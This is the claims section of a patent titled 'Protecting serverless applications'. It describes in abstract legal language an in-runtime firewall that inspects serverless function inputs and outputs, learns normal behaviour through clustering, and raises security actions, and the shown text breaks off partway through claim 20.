Protecting serverless applications

The invention claimed is: 1. A method comprising: protecting a serverless application that uses a serverless function with protection logic that inspects, within a runtime environment of the serverless function, inputs to the serverless function and outputs from the serverless function, wherein protecting the serverless application comprises, inspecting event data to be input to a first instance of the serverless function and event context based on detection of an event that triggers the serverless function; allowing the first instance of the serverless function to execute with input of the event data if determined to not include unsafe data; determining whether behavior of the first instance of the serverless function conforms to normal behavior for the serverless function learned from observations of historical instances of the serverless function; inspecting output of the first instance of the serverless function to determine whether the output contains unsafe data; and raising a security action if the event data or the output is determined to contain unsafe data or if the behavior of the first instance of the serverless function does not conform to the normal behavior. 2. The method of claim 1 further comprising inserting sensors into at least one of the runtime environment and the serverless function, wherein the sensors collect execution data corresponding to behavior. 3. The method of claim 2 , wherein inserting the sensors comprises one of embedding the sensors in the serverless function, wrapping the serverless function with wrapper code, and dynamic hooking. 4. The method of claim 1 further comprising wrapping the serverless function with wrapper code that implements the protection logic. 5. The method of claim 1 further comprising instantiating in the runtime environment software that implements the protection logic. 6. The method of claim 1 , wherein protecting the serverless application further comprises determining which of the event data is irrelevant to execution of the serverless function based on the event context and clearing the irrelevant data prior to inspecting the event data. 7. The method of claim 1 , wherein protecting the serverless application further comprises determining a field in the event data is encoded and decoding the field prior to inspecting the event data. 8. The method of claim 1 , wherein inspecting the event data comprises performing application layer checks on the event data. 9. The method of claim 1 , wherein inspecting the event data comprises determining whether the event data conforms to a normal input profile built based on statistical analysis of previous inputs determined to not contain unsafe data across different instance of the serverless function. 10. The method of claim 9 , wherein the normal input profile indicates a set of input attributes that at least include format and size/length. 11. The method of claim 1 , further comprising learning the normal behavior, wherein learning the normal behavior comprises collecting samples of behavior of the historical instances and clustering the samples, wherein determining whether behavior of the first instance of the serverless function conforms to the normal behavior comprises classifying the behavior of the first instance of the serverless function based on the clustering. 12. The method of claim 1 further comprising learning the normal behavior from the observations of historical instances of the serverless function, wherein the observations correspond to at least one of external data sources accessed by the historical instances, sequences of operations or interactions performed by the historical instances, and which operations or interactions are performed when accessing an external resource. 13. The method of claim 1 further comprising generating a policy based on the learned normal behavior and enforcing the policy, wherein enforcing the policy comprises determining whether behavior of the first instance of the serverless function conforms to the policy. 14. A non-transitory, machine-readable medium having program code stored thereon, the program code comprising instructions to: load an application firewall into a runtime environment of a serverless function based, at least in part, on detection of an event that triggers the serverless function; inspect, with the application firewall, event data to be input to a first instance of the serverless function and event context; allow the first instance of the serverless function to execute with input of the event data if determined to not include unsafe data; determine whether behavior of the first instance of the serverless function conforms to normal behavior for the serverless function learned from observations of historical instances of the serverless function; inspect output of the first instance of the serverless function to determine whether the output contains unsafe data; and raise a security action if the event data or the output is determined to contain unsafe data or if the behavior of the first instance of the serverless function does not conform to the normal behavior. 15. The non-transitory, machine-readable medium of claim 14 , wherein the program code further comprises instructions to insert sensors into at least one of the runtime environment and the serverless function, wherein the sensors collect execution data corresponding to behavior. 16. The non-transitory, machine-readable medium of claim 14 , wherein the program code further comprises instructions to also load into the runtime environment the instructions to determine whether behavior of the first instance of the serverless function conforms to learned normal behavior and the instructions to inspect output. 17. The non-transitory, machine-readable medium of claim 14 , wherein the program code further comprises instructions to determine which of the event data is irrelevant to execution of the serverless function based on the event context and to clear the irrelevant data prior to inspection of the event data and/or instructions to determine whether the event data includes an encoded field and to decode an encoded field. 18. The non-transitory, machine-readable medium of claim 14 , wherein the instructions to inspect the event data comprise instructions to determine whether the event data conforms to a normal input profile built based on statistical analysis of previous inputs determined to not contain unsafe data across different instances of the serverless function, wherein the normal input profile indicates a set of input attributes that at least include format and size/length. 19. The non-transitory, machine-readable medium of claim 14 , wherein the program code further comprises instructions to learn the normal behavior, wherein the instructions to learn the normal behavior comprise instructions to collect samples of behavior of the historical instances and cluster the samples, wherein the instructions to determine whether behavior of the first instance of the serverless function conforms to the normal behavior comprise instructions to classify the behavior of the first instance of the serverless function based on the clustering, wherein the observations correspond to at least one of external data sources accessed by the historical instances, sequences of operations or interactions performed by the historical instances, and which operations or interactions are performed when accessing an external resource. 20. The non-transitory, machine-readable medium of claim 14 , wherein the program c